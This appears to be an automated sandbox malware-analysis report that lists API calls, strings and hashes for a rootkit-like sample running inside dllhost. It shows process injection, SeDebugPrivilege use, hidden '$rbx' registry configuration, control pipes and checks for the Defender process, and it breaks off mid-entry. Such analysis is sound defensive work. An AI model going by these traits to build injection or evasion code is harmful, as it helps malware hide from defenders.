RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F5E
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F70
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002F76

Part of subcall function 000000014000200C: GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002021
Part of subcall function 000000014000200C: HeapAlloc.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002032
Part of subcall function 000000014000200C: OpenProcess.KERNEL32 ref: 0000000140002079
Part of subcall function 000000014000200C: TerminateProcess.KERNEL32 ref: 000000014000208C
Part of subcall function 000000014000200C: CloseHandle.KERNEL32 ref: 0000000140002095
Part of subcall function 000000014000200C: GetProcessHeap.KERNEL32 ref: 00000001400020A5

RegCreateKeyExW.KERNELBASE ref: 0000000140002FB2
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000140002FD9
RegSetKeySecurity.KERNELBASE ref: 0000000140002FF2
LocalFree.KERNEL32 ref: 0000000140002FFC
RegCreateKeyExW.KERNELBASE ref: 0000000140003032
GetCurrentProcessId.KERNEL32 ref: 000000014000303C
RegSetValueExW.KERNELBASE ref: 0000000140003063
RegCloseKey.KERNELBASE ref: 000000014000306D
RegCloseKey.ADVAPI32 ref: 0000000140003077
CreateThread.KERNELBASE ref: 0000000140003098
GetProcessHeap.KERNEL32 ref: 000000014000309E
HeapAlloc.KERNEL32 ref: 00000001400030AD
CreateThread.KERNELBASE ref: 00000001400030DB
CreateThread.KERNELBASE ref: 00000001400030FC
ShellExecuteW.SHELL32 ref: 0000000140003136
GetProcessHeap.KERNEL32 ref: 0000000140003196
HeapFree.KERNEL32 ref: 00000001400031A4
SleepEx.KERNELBASE ref: 00000001400031AD

Strings

SeDebugPrivilege, xrefs: 0000000140002DDF
SOFTWARE\$rbx-config, xrefs: 0000000140002F91
$rbx-dll64, xrefs: 0000000140002EAA, 0000000140002F43
?, xrefs: 0000000140003026
$rbx-dll32, xrefs: 0000000140002E7A, 0000000140002F09
kernel32.dll, xrefs: 0000000140002D99
SOFTWARE, xrefs: 0000000140002E52
open, xrefs: 0000000140003117
pid, xrefs: 000000014000300F
ntdll.dll, xrefs: 0000000140002D8D
svc64, xrefs: 0000000140003046
Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d, xrefs: 0000000140002D5E
D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA), xrefs: 0000000140002FD2

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
API String ID: 2725631067-1382791509
Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

Function 0000000140001868 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 287
memorystringnativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32 ref: 000000014000189E
IsWow64Process.KERNEL32 ref: 00000001400018BA
CloseHandle.KERNELBASE ref: 00000001400018DE
OpenProcess.KERNEL32 ref: 0000000140001939
OpenProcess.KERNEL32 ref: 0000000140001958
K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
PathFindFileNameW.SHLWAPI ref: 0000000140001987
lstrlenW.KERNEL32 ref: 0000000140001993
StrCpyW.SHLWAPI ref: 00000001400019AA
CloseHandle.KERNEL32 ref: 00000001400019B6
StrCmpIW.SHLWAPI ref: 00000001400019EA
NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
OpenProcessToken.ADVAPI32 ref: 0000000140001A43
GetTokenInformation.KERNELBASE ref: 0000000140001A6F
GetLastError.KERNEL32 ref: 0000000140001A79
LocalAlloc.KERNEL32 ref: 0000000140001A8C
GetTokenInformation.KERNELBASE ref: 0000000140001AB8
GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
LocalFree.KERNEL32 ref: 0000000140001AEC
CloseHandle.KERNEL32 ref: 0000000140001B00
StrStrA.SHLWAPI ref: 0000000140001BAB
VirtualAllocEx.KERNEL32 ref: 0000000140001C15
WriteProcessMemory.KERNELBASE ref: 0000000140001C38
WaitForSingleObject.KERNEL32 ref: 0000000140001C79
GetExitCodeThread.KERNEL32 ref: 0000000140001C8F
VirtualFreeEx.KERNELBASE ref: 0000000140001CB1
CloseHandle.KERNELBASE ref: 0000000140001CC2
CloseHandle.KERNEL32 ref: 0000000140001CCB

Strings

MsMpEng.exe, xrefs: 00000001400019C1
ReflectiveDllMain, xrefs: 0000000140001BA1
@, xrefs: 0000000140001C08
MSBuild.exe, xrefs: 00000001400019D4

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
API String ID: 2456419452-2628171563
Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

Function 0000000140003204 Relevance: 47.5, APIs: 20, Strings: 7, Instructions: 236
registrymemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 000000014000327C

Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 000000014000189E
Part of subcall function 0000000140001868: IsWow64Process.KERNEL32 ref: 00000001400018BA
Part of subcall function 0000000140001868: CloseHandle.KERNELBASE ref: 00000001400018DE
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001939
Part of subcall function 0000000140001868: OpenProcess.KERNEL32 ref: 0000000140001958
Part of subcall function 0000000140001868: K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001979
Part of subcall function 0000000140001868: PathFindFileNameW.SHLWAPI ref: 0000000140001987
Part of subcall function 0000000140001868: lstrlenW.KERNEL32 ref: 0000000140001993
Part of subcall function 0000000140001868: StrCpyW.SHLWAPI ref: 00000001400019AA
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 00000001400019B6
Part of subcall function 0000000140001868: StrCmpIW.SHLWAPI ref: 00000001400019EA

Part of subcall function 0000000140001868: NtQueryInformationProcess.NTDLL ref: 0000000140001A1B
Part of subcall function 0000000140001868: OpenProcessToken.ADVAPI32 ref: 0000000140001A43
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001A6F
Part of subcall function 0000000140001868: GetLastError.KERNEL32 ref: 0000000140001A79
Part of subcall function 0000000140001868: LocalAlloc.KERNEL32 ref: 0000000140001A8C
Part of subcall function 0000000140001868: GetTokenInformation.KERNELBASE ref: 0000000140001AB8
Part of subcall function 0000000140001868: GetSidSubAuthorityCount.ADVAPI32 ref: 0000000140001AC5
Part of subcall function 0000000140001868: GetSidSubAuthority.ADVAPI32 ref: 0000000140001AD4
Part of subcall function 0000000140001868: LocalFree.KERNEL32 ref: 0000000140001AEC
Part of subcall function 0000000140001868: CloseHandle.KERNEL32 ref: 0000000140001B00
Part of subcall function 0000000140001868: StrStrA.SHLWAPI ref: 0000000140001BAB

RegOpenKeyExW.ADVAPI32 ref: 000000014000330D
RegDeleteValueW.ADVAPI32 ref: 0000000140003325
RegDeleteValueW.ADVAPI32 ref: 0000000140003339
RegDeleteValueW.ADVAPI32 ref: 000000014000334D
ExitProcess.KERNEL32 ref: 0000000140003384
GetProcessHeap.KERNEL32 ref: 000000014000338B
HeapAlloc.KERNEL32 ref: 000000014000339E
K32EnumProcesses.KERNEL32 ref: 00000001400033BB
ExitProcess.KERNEL32 ref: 0000000140003479

Strings

$rbx-stager, xrefs: 000000014000331E
$rbx-dll32, xrefs: 0000000140003332
$rbx-dll64, xrefs: 0000000140003346
SOFTWARE, xrefs: 00000001400032FF
$rbx-svc32, xrefs: 0000000140003353
$rbx-svc64, xrefs: 000000014000335F
open, xrefs: 000000014000357B

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
API String ID: 4225498131-1538754800
Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

Function 0000000140001CF0 Relevance: 19.6, APIs: 13, Instructions: 131
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140001D23
HeapAlloc.KERNEL32 ref: 0000000140001D36
GetProcessHeap.KERNEL32 ref: 0000000140001D44
HeapAlloc.KERNEL32 ref: 0000000140001D55
K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
OpenProcess.KERNEL32 ref: 0000000140001D9D
K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
ReadProcessMemory.KERNEL32 ref: 0000000140001E01
CloseHandle.KERNELBASE ref: 0000000140001E46
GetProcessHeap.KERNEL32 ref: 0000000140001E58
RtlFreeHeap.NTDLL ref: 0000000140001E66
GetProcessHeap.KERNEL32 ref: 0000000140001E6C
RtlFreeHeap.NTDLL ref: 0000000140001E7A

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
String ID:
API String ID: 4084875642-0
Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

Function 0000000140002300 Relevance: 9.1, APIs: 6, Instructions: 82
memorypipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
LocalAlloc.KERNEL32 ref: 00000001400023A7
InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
String ID:
API String ID: 3197395349-0
Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

Function 0000000140002A0C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124
filememorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCpyW.SHLWAPI ref: 0000000140002A3D
StrCatW.SHLWAPI ref: 0000000140002A4B
GetModuleHandleW.KERNEL32 ref: 0000000140002A54
GetCurrentProcess.KERNEL32 ref: 0000000140002A74
K32GetModuleInformation.KERNEL32 ref: 0000000140002A88
CreateFileW.KERNELBASE ref: 0000000140002AB8
CreateFileMappingW.KERNELBASE ref: 0000000140002AE2
MapViewOfFile.KERNELBASE ref: 0000000140002B05
lstrcmpiA.KERNEL32 ref: 0000000140002B5B
VirtualProtect.KERNEL32 ref: 0000000140002B8E
VirtualProtect.KERNEL32 ref: 0000000140002BBE
CloseHandle.KERNELBASE ref: 0000000140002BC7
CloseHandle.KERNEL32 ref: 0000000140002BD0
FreeLibrary.KERNEL32 ref: 0000000140002BD9

Strings

C:\Windows\System32\, xrefs: 0000000140002A2F
.text, xrefs: 0000000140002B54

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
String ID: .text$C:\Windows\System32\
API String ID: 2721474350-832442975
Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

Function 0000000140003728 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40
sleepfilepipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 000000014000374D
ConnectNamedPipe.KERNELBASE ref: 000000014000375A
ReadFile.KERNELBASE ref: 000000014000377D
WriteFile.KERNEL32 ref: 00000001400037AB
Sleep.KERNEL32 ref: 00000001400037B8
DisconnectNamedPipe.KERNELBASE ref: 00000001400037C1

Strings

M, xrefs: 000000014000379E
\\.\pipe\$rbx-childproc, xrefs: 0000000140003735

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\$rbx-childproc
API String ID: 2203880229-2840927681
Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

Function 0000000140002CB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140002300: AllocateAndInitializeSid.ADVAPI32 ref: 000000014000234F
Part of subcall function 0000000140002300: SetEntriesInAclW.ADVAPI32 ref: 0000000140002397
Part of subcall function 0000000140002300: LocalAlloc.KERNEL32 ref: 00000001400023A7
Part of subcall function 0000000140002300: InitializeSecurityDescriptor.ADVAPI32 ref: 00000001400023BB
Part of subcall function 0000000140002300: SetSecurityDescriptorDacl.ADVAPI32 ref: 00000001400023D2
Part of subcall function 0000000140002300: CreateNamedPipeW.KERNELBASE ref: 0000000140002413

Sleep.KERNEL32 ref: 0000000140002CD5
ConnectNamedPipe.KERNELBASE ref: 0000000140002CE2
ReadFile.KERNELBASE ref: 0000000140002D05
Sleep.KERNEL32 ref: 0000000140002D26
DisconnectNamedPipe.KERNELBASE ref: 0000000140002D2F

Strings

\\.\pipe\$rbx-control, xrefs: 0000000140002CBD

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\$rbx-control
API String ID: 2071455217-3647231676
Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

Function 0000000140003668 Relevance: 9.1, APIs: 6, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140003683
HeapAlloc.KERNEL32 ref: 0000000140003697
GetProcessHeap.KERNEL32 ref: 00000001400036A0
HeapAlloc.KERNEL32 ref: 00000001400036AE
K32EnumProcesses.KERNEL32 ref: 00000001400036C9
SleepEx.KERNELBASE ref: 000000014000371E

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00

Function 000000014000200C Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002021
HeapAlloc.KERNEL32(?,?,00000000,0000000140002F83), ref: 0000000140002032

Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D23
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D36
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001D44
Part of subcall function 0000000140001CF0: HeapAlloc.KERNEL32 ref: 0000000140001D55
Part of subcall function 0000000140001CF0: K32EnumProcesses.KERNEL32 ref: 0000000140001D6F
Part of subcall function 0000000140001CF0: OpenProcess.KERNEL32 ref: 0000000140001D9D
Part of subcall function 0000000140001CF0: K32EnumProcessModulesEx.KERNEL32 ref: 0000000140001DCA
Part of subcall function 0000000140001CF0: ReadProcessMemory.KERNEL32 ref: 0000000140001E01
Part of subcall function 0000000140001CF0: CloseHandle.KERNELBASE ref: 0000000140001E46
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E58
Part of subcall function 0000000140001CF0: RtlFreeHeap.NTDLL ref: 0000000140001E66
Part of subcall function 0000000140001CF0: GetProcessHeap.KERNEL32 ref: 0000000140001E6C
Part of subcall function 0000000140001CF0: RtlFreeHeap.NTDLL ref: 0000000140001E7A

OpenProcess.KERNEL32 ref: 0000000140002079
TerminateProcess.KERNEL32 ref: 000000014000208C
CloseHandle.KERNEL32 ref: 0000000140002095
GetProcessHeap.KERNEL32 ref: 00000001400020A5

Memory Dump Source

Source File: 00000029.00000002.2541397651.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000029.00000002.2540276586.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2542601323.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2543865974.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_140000000_dllhost.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

Function 000001EF0922F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000001EF0922F611
GetFileType.KERNELBASE ref: 000001EF0922F627

Memory Dump Source

Source File: 00000029.00000002.2559448356.000001EF09221000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09220000, based on PE: true

Associated: 00000029.00000002.2558072529.000001EF09220000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2560943565.000001EF09235000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2562220418.000001EF09240000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2563504465.000001EF09242000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2564786322.000001EF09249000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09220000_dllhost.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: ffbac369c18f143fc03c3b12c9ce07c9621191a5ebff605c147a08a62b497c6a
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 50312F32614A84A1E7608B15D6802ED6762F385BA0F69132DEF7A573F1EB35D4A2D340

Function 000001EF0942F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000001EF0942F611
GetFileType.KERNELBASE ref: 000001EF0942F627

Memory Dump Source

Source File: 00000029.00000002.2575650858.000001EF09421000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001EF09420000, based on PE: true

Associated: 00000029.00000002.2574989721.000001EF09420000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2576698081.000001EF09435000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2577528865.000001EF09440000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2578421062.000001EF09442000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000029.00000002.2579609444.000001EF09449000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_41_2_1ef09420000_dllhost.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: 9c60be35d56bdd615056dc63be87aeb21c82862214a49e02f75b78d9983f1d10
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 11316035614AC491EB608B14D5802AD2662F385BB0FE8C3ADEF6A073E1DB36D4A7C340

Function 000001EF0942D2A0 Relevance: 3.0, APIs: 2, Instructions: 18
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,000001EF0942674A), ref: 000001EF0942D2B6
GetLastError.KERNEL32(?,?,?,?,?,?,?,000001EF0942674A), ref: 000001EF0942D2C0

Memory Dump Source

